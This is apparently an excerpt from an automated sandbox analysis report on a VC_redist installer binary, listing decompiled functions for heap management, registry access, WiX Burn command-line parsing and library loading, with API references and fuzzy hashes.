                                                                          • RtlFreeHeap.NTDLL(00000000,?,00013B34,00000000,?,00011472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000113B7,000001C7,00000100), ref: 000139AA
                                                                          • GetLastError.KERNEL32(?,00013B34,00000000,?,00011472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000113B7,000001C7,00000100,?), ref: 000139B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ErrorFreeLastProcess
                                                                          • String ID: @Met
                                                                          • API String ID: 406640338-2381362037
                                                                          • Opcode ID: 6b48bfd4fc31ea28ae8534e1e3af41ba0c7f9cdcaa2d6f303c03ea4218dd2fcb
                                                                          • Instruction ID: 6c442720b8eea27465eda6b558bf25ff948ebe8db821d17b40cc00dc889000ff
                                                                          • Opcode Fuzzy Hash: 6b48bfd4fc31ea28ae8534e1e3af41ba0c7f9cdcaa2d6f303c03ea4218dd2fcb
                                                                          • Instruction Fuzzy Hash: 76D012326007346797602BFA5C0C697BE9CEF456A27414021FD05D6110D729981086E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001501B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0001501B(signed short* _a4) {
				signed int _t8;
				int _t9;
				int _t12;
				signed int _t13;
				short* _t15;
				signed int _t16;
				signed short* _t17;
				int _t19;

				_t8 =  *0x7aa50; // 0x1
				_t15 = L"burn.clean.room";
				_t19 = 1;
				if((_t8 & 0x00000001) != 0) {
					_t9 =  *0x7aa4c; // 0xf
				} else {
					 *0x7aa50 = _t8 | 1;
					_t9 = lstrlenW(_t15);
					 *0x7aa4c = _t9;
				}
				_t17 = _a4;
				if(_t17 == 0) {
					L8:
					_t19 = 0;
				} else {
					_t16 =  *_t17 & 0x0000ffff;
					if(_t16 == 0x2d || _t16 == 0x2f) {
						_t12 = CompareStringW(0x7f, _t19,  &(_t17[1]), _t9, _t15, _t9); // executed
						if(_t12 != 2) {
							goto L8;
						} else {
							_t13 =  *0x7aa4c; // 0xf
							if( *((short*)(_t17 + 2 + _t13 * 2)) != 0x3d) {
								goto L8;
							}
						}
					} else {
						goto L8;
					}
				}
				return _t19;
			}











                                                                          0x0001501e
                                                                          0x00015027
                                                                          0x0001502c
                                                                          0x00015030
                                                                          0x00015047
                                                                          0x00015032
                                                                          0x00015035
                                                                          0x0001503a
                                                                          0x00015040
                                                                          0x00015040
                                                                          0x0001504c
                                                                          0x00015051
                                                                          0x00015082
                                                                          0x00015082
                                                                          0x00015053
                                                                          0x00015053
                                                                          0x00015059
                                                                          0x0001506a
                                                                          0x00015073
                                                                          0x00000000
                                                                          0x00015075
                                                                          0x00015075
                                                                          0x00015080
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00015080
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00015059
                                                                          0x0001508a

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00011104,?,?,00000000), ref: 0001503A
                                                                          • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00011104,?,?,00000000), ref: 0001506A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareStringlstrlen
                                                                          • String ID: burn.clean.room
                                                                          • API String ID: 1433953587-3055529264
                                                                          • Opcode ID: 733efcb49af034f6bf26c0d85967be9bd46235f59b9e67c8bbce16cd402678c1
                                                                          • Instruction ID: 46657d43e3191e70f390d1fe261849649f404c38aef1e08d3ce1830199cd57e2
                                                                          • Opcode Fuzzy Hash: 733efcb49af034f6bf26c0d85967be9bd46235f59b9e67c8bbce16cd402678c1
                                                                          • Instruction Fuzzy Hash: A701D672E00625EE93614B9D9C84DB7B7ACFB8D7527104116F909D7610D378ACC0C7E2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00050E3F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00050E3F(void* _a4, short* _a8, int _a12, void** _a16) {
				signed short _t5;
				void* _t8;
				signed short _t12;
				int _t14;

				_t14 = 0;
				_t5 = RegOpenKeyExW(_a4, _a8, 0, _a12, _a16); // executed
				_t12 = _t5;
				_t8 =  <=  ? _t12 : _t12 & 0x0000ffff | 0x80070000;
				if(_t8 != 0x80070002) {
					if(_t12 != 0) {
						_t14 =  >=  ? 0x80004005 : _t8;
						E000137D3(0x80004005, "regutil.cpp", 0xa7, _t14);
					}
				} else {
					_t14 = 0x80070002;
				}
				return _t14;
			}







                                                                          0x00050e46
                                                                          0x00050e52
                                                                          0x00050e58
                                                                          0x00050e69
                                                                          0x00050e6e
                                                                          0x00050e76
                                                                          0x00050e81
                                                                          0x00050e8f
                                                                          0x00050e8f
                                                                          0x00050e70
                                                                          0x00050e70
                                                                          0x00050e70
                                                                          0x00050e98

                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 71445658-955085611
                                                                          • Opcode ID: 26aae15d54b579bdade6e1856a7ef47251cac367098651a64499892e4c3cc6f2
                                                                          • Instruction ID: ab7d40d34688d682ed33dfc7781fa9525745c00b79f5135adccfc0ebd22485a5
                                                                          • Opcode Fuzzy Hash: 26aae15d54b579bdade6e1856a7ef47251cac367098651a64499892e4c3cc6f2
                                                                          • Instruction Fuzzy Hash: C1F0A7727011356BEF2449564C01BAB7DC5DF447A1F118524BD4DDA251D236CC1092D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00013A72 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E00013A72(void* _a4, long _a8, signed int _a12) {
				void* _t8;

				asm("sbb eax, eax");
				_t8 = RtlReAllocateHeap(GetProcessHeap(),  ~_a12 & 0x00000008, _a4, _a8); // executed
				return _t8;
			}




                                                                          0x00013a80
                                                                          0x00013a8d
                                                                          0x00013a94

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,000001C7,?,?,0001227D,?,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000), ref: 00013A86
                                                                          • RtlReAllocateHeap.NTDLL(00000000,?,0001227D,?,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013A8D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateProcess
                                                                          • String ID:
                                                                          • API String ID: 1357844191-0
                                                                          • Opcode ID: e75aa6fdfc01c109b8215c4c9b43ddf0ca59e7b661224a2e2cb39917be519d40
                                                                          • Instruction ID: be21f592a55ad616739a8d05fe8c3f0a316651d908b71ddb3288a1e7bace3ae3
                                                                          • Opcode Fuzzy Hash: e75aa6fdfc01c109b8215c4c9b43ddf0ca59e7b661224a2e2cb39917be519d40
                                                                          • Instruction Fuzzy Hash: E9D0C932150709AB9F405FE8DC09DAE3BACEB586137408405B915C2110CB3DE4609A64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00053499 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E00053499(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				short _v30;
				void _v32;
				void* _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				void* _v56;
				short _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				void* _t39;
				void* _t46;
				void* _t48;
				short _t49;
				void* _t55;
				intOrPtr* _t59;
				signed int _t60;
				void* _t65;
				signed int _t74;
				void* _t75;
				void* _t76;

				_t31 =  *0x7a008; // 0xfbf51acb
				_v8 = _t31 ^ _t74;
				_v40 = _a4;
				_v48 = _a12;
				_t60 = 6;
				memset( &_v32, 0, _t60 << 2);
				_t76 = _t75 + 0xc;
				_v36 = 0;
				_v44 = 0;
				__imp__#8( &_v64);
				_t39 = E00052F23(0,  &_v36, 0); // executed
				_t59 = _v36;
				_t69 = 1;
				_t71 =  ==  ? 0x80004005 : _t39;
				if(( ==  ? 0x80004005 : _t39) >= 0) {
					_t46 =  *((intOrPtr*)( *_t59 + 0x110))(_t59, 0);
					_t71 = _t46;
					if(_t46 >= 0) {
						_t48 =  *((intOrPtr*)( *_t59 + 0x118))(_t59, 0);
						_t71 = _t48;
						if(_t48 >= 0) {
							_t49 = 0x12;
							_v30 = _t49;
							_v20 = _v40;
							_v32 = 1;
							_v28 = 1;
							_v16 = _a8;
							_t69 = _t76 - 0x10;
							_v64 = 0x2011;
							_v56 =  &_v32;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd"); // executed
							_t55 =  *((intOrPtr*)( *_t59 + 0xe8))(_t59,  &_v44);
							_t71 =  ==  ? 0x8007006e : _t55;
							if(( ==  ? 0x8007006e : _t55) >= 0) {
								 *_v48 = _t59;
								_t59 = 0;
							}
						}
					}
				}
				if(_t59 != 0) {
					 *((intOrPtr*)( *_t59 + 8))(_t59);
				}
				return E0003DE36(_t59, _v8 ^ _t74, _t65, _t69, _t71);
			}































                                                                          0x0005349f
                                                                          0x000534a6
                                                                          0x000534af
                                                                          0x000534bc
                                                                          0x000534c1
                                                                          0x000534c2
                                                                          0x000534c2
                                                                          0x000534c7
                                                                          0x000534cb
                                                                          0x000534ce
                                                                          0x000534da
                                                                          0x000534df
                                                                          0x000534e6
                                                                          0x000534ee
                                                                          0x000534f3
                                                                          0x000534fa
                                                                          0x00053500
                                                                          0x00053504
                                                                          0x0005350b
                                                                          0x00053511
                                                                          0x00053515
                                                                          0x00053519
                                                                          0x0005351a
                                                                          0x00053527
                                                                          0x0005352d
                                                                          0x00053531
                                                                          0x00053535
                                                                          0x00053540
                                                                          0x00053542
                                                                          0x00053549
                                                                          0x0005354e
                                                                          0x00053550
                                                                          0x00053551
                                                                          0x00053552
                                                                          0x00053553
                                                                          0x00053563
                                                                          0x00053568
                                                                          0x0005356d
                                                                          0x0005356f
                                                                          0x0005356f
                                                                          0x00053568
                                                                          0x00053515
                                                                          0x00053504
                                                                          0x00053573
                                                                          0x00053578
                                                                          0x00053578
                                                                          0x0005358d

                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 000534CE
                                                                            • Part of subcall function 00052F23: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,000534DF,00000000,?,00000000), ref: 00052F3D
                                                                            • Part of subcall function 00052F23: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0003BDED,?,000152FD,?,00000000,?), ref: 00052F49
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandleInitLastModuleVariant
                                                                          • String ID:
                                                                          • API String ID: 52713655-0
                                                                          • Opcode ID: 8725502df5bda73bd2a45482b171a9041718c704d0d5538ea0efb8c542d20e1c
                                                                          • Instruction ID: 3a658705028cedeb75ccbe45b91c7435646de635f0a7127b1f079a03eb0ebe00
                                                                          • Opcode Fuzzy Hash: 8725502df5bda73bd2a45482b171a9041718c704d0d5538ea0efb8c542d20e1c
                                                                          • Instruction Fuzzy Hash: BB311C76E006199BCB11DFA8C884ADEF7F8EF08751F01456AED15FB311E6759E048BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00055728 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E00055728(void* __ecx, intOrPtr _a4, short* _a8, intOrPtr _a12, char** _a16) {
				void* _v8;
				void* _t13;
				char** _t24;
				void* _t27;

				_push(__ecx);
				_v8 = 0;
				_t13 = E00055664(__ecx, _a4,  &_v8); // executed
				_t24 = _a16;
				_t27 = _t13;
				if(_t27 == 0x80070002 || _t27 == 0x80070003) {
					L5:
					_t27 = 1;
					goto L6;
				} else {
					if(_t27 < 0) {
						L6:
						if(_v8 != 0) {
							RegCloseKey(_v8);
							_v8 = 0;
						}
						if(_t27 == 1 || _t27 < 0) {
							if(_a12 != 0) {
								_t27 = E000121A5(_t24, _a12, 0);
							} else {
								if( *_t24 != 0) {
									E000554EF( *_t24);
									 *_t24 = 0;
								}
							}
						}
						return _t27;
					}
					_t27 = E00050F6E(_v8, _a8, _t24);
					if(_t27 == 0x80070002 || _t27 == 0x80070003) {
						goto L5;
					} else {
						goto L6;
					}
				}
			}







                                                                          0x0005572b
                                                                          0x00055738
                                                                          0x0005573b
                                                                          0x00055740
                                                                          0x00055743
                                                                          0x0005574b
                                                                          0x00055777
                                                                          0x00055779
                                                                          0x00000000
                                                                          0x00055755
                                                                          0x00055757
                                                                          0x0005577a
                                                                          0x0005577d
                                                                          0x00055782
                                                                          0x00055788
                                                                          0x00055788
                                                                          0x0005578e
                                                                          0x00055797
                                                                          0x000557b2
                                                                          0x00055799
                                                                          0x0005579b
                                                                          0x0005579f
                                                                          0x000557a4
                                                                          0x000557a4
                                                                          0x0005579b
                                                                          0x00055797
                                                                          0x000557bc
                                                                          0x000557bc
                                                                          0x00055765
                                                                          0x0005576d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005576d

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(80070490,00000000,80070490,0007AAA0,00000000,80070490,00000000,?,0002890E,WiX\Burn,PackageCache,00000000,0007AAA0,00000000,00000000,80070490), ref: 00055782
                                                                            • Part of subcall function 00050F6E: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00050FE4
                                                                            • Part of subcall function 00050F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0005101F
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$Close
                                                                          • String ID:
                                                                          • API String ID: 1979452859-0
                                                                          • Opcode ID: 70e6627db2ed79aa38a53d064a16ae6ffae6db4f6594bd7e2964536954b8da0f
                                                                          • Instruction ID: 1972c38a75a502f1f9ccca57ed870694d0f80428288339a41573924c215e985e
                                                                          • Opcode Fuzzy Hash: 70e6627db2ed79aa38a53d064a16ae6ffae6db4f6594bd7e2964536954b8da0f
                                                                          • Instruction Fuzzy Hash: 1F11C23680462DEBCF21AEA4ECA59EFB6A9EB0C323B150279ED0167111D3324D54DAD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004523F Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E0004523F(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x7b5b8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00044A8E();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00043E36())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00044ADD(_t15, _t16, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}










                                                                          0x0004523f
                                                                          0x00045245
                                                                          0x0004524a
                                                                          0x00045258
                                                                          0x00045258
                                                                          0x0004525e
                                                                          0x00045260
                                                                          0x00045260
                                                                          0x00045277
                                                                          0x00045280
                                                                          0x00045288
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00045268
                                                                          0x0004526a
                                                                          0x0004528c
                                                                          0x00045291
                                                                          0x00045297
                                                                          0x00000000
                                                                          0x00045297
                                                                          0x0004526d
                                                                          0x00045272
                                                                          0x00045273
                                                                          0x00045275
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00045275
                                                                          0x00000000
                                                                          0x00045277
                                                                          0x00045250
                                                                          0x00045251
                                                                          0x00045256
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00046113,00000001,00000364), ref: 00045280
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: aeadb455809f092d832be1fdc03fb1a5bded98e9e91a3b7c3860488b9de4f52e
                                                                          • Instruction ID: f8fdc5202438e77d37b5709cdce39d0378ee213a12a186c59300e1965c8e0c81
                                                                          • Opcode Fuzzy Hash: aeadb455809f092d832be1fdc03fb1a5bded98e9e91a3b7c3860488b9de4f52e
                                                                          • Instruction Fuzzy Hash: 01F0BBB564492467ABB16A614E05B5F37889F43762B184133EC04AB183DBA0DC0546DD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000134C5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,000289CA,0000001C,80070490,00000000,00000000,80070490), ref: 000134E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPath
                                                                          • String ID:
                                                                          • API String ID: 1514166925-0
                                                                          • Opcode ID: 3b847faf9bf1ee29f96150c6eea795d5692b85ac2a66ed0152eff036378fdaac
                                                                          • Instruction ID: 90a23fca0b159d853829302cd5dfc5f31867f0cca6e27be19586fb4047ac8c91
                                                                          • Opcode Fuzzy Hash: 3b847faf9bf1ee29f96150c6eea795d5692b85ac2a66ed0152eff036378fdaac
                                                                          • Instruction Fuzzy Hash: 48E01272201225BBEB022EA65C05DEB7B9CDF057507008451BE40E6011E765FA9086F0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00052DD0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00052DD0() {
				struct HINSTANCE__* _t1;

				_t1 =  *0x7b680; // 0x0
				if(_t1 != 0) {
					_t1 = FreeLibrary(_t1); // executed
					 *0x7b680 = 0;
					 *0x7b6bc = 0;
					 *0x7b6b8 = 0;
					 *0x7b6b4 = 0;
					 *0x7b6b0 = 0;
					 *0x7b6ac = 0;
					 *0x7b6a8 = 0;
					 *0x7b6c0 = 0;
				}
				 *0x7b6c4 = 0;
				return _t1;
			}




                                                                          0x00052dd0
                                                                          0x00052dda
                                                                          0x00052ddd
                                                                          0x00052de3
                                                                          0x00052de9
                                                                          0x00052def
                                                                          0x00052df5
                                                                          0x00052dfb
                                                                          0x00052e01
                                                                          0x00052e07
                                                                          0x00052e0d
                                                                          0x00052e0d
                                                                          0x00052e13
                                                                          0x00052e1a

                                                                          APIs
                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,0001547B,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00052DDD
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID:
                                                                          • API String ID: 3664257935-0
                                                                          • Opcode ID: 974af3f3f641e407b2a2d5c545ed580c6b43277e55e956896c8565318acf44d1
                                                                          • Instruction ID: 04ab21ef23d650ef04b463cac5bf9f621f796f5083b283c8b29bc0d74b9574bc
                                                                          • Opcode Fuzzy Hash: 974af3f3f641e407b2a2d5c545ed580c6b43277e55e956896c8565318acf44d1
                                                                          • Instruction Fuzzy Hash: C6E0F6F5D262289AAB50AF59BD486427FB8BB08B41321465FF608F2260C3BC54808FA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004F349 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E0004F349() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E00059814(_t3, _t5, _t7, 0x78024, 0x7a94c); // executed
				goto __eax;
			}






                                                                          0x0004f353
                                                                          0x0004f354
                                                                          0x0004f35b
                                                                          0x0004f362

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0004F35B
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: a6c15b8230bb0f3d25c7727e70e84b10804708b6576308a1f831200f09852bfb
                                                                          • Instruction ID: 892fd56f6b63ce80a6b4576ad43bdbf4ce6f35e8b439df9040ed6ae2c9cafbb2
                                                                          • Opcode Fuzzy Hash: a6c15b8230bb0f3d25c7727e70e84b10804708b6576308a1f831200f09852bfb
                                                                          • Instruction Fuzzy Hash: FCB012D2B98402BC32441310AC0AC3F020CC3C2F26334D03ABB04C4041EC8C0E0A503A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004F36A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E0004F36A() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E00059814(_t3, _t5, _t7, 0x78024, 0x7a944); // executed
				goto __eax;
			}






                                                                          0x0004f353
                                                                          0x0004f354
                                                                          0x0004f35b
                                                                          0x0004f362

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0004F35B
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
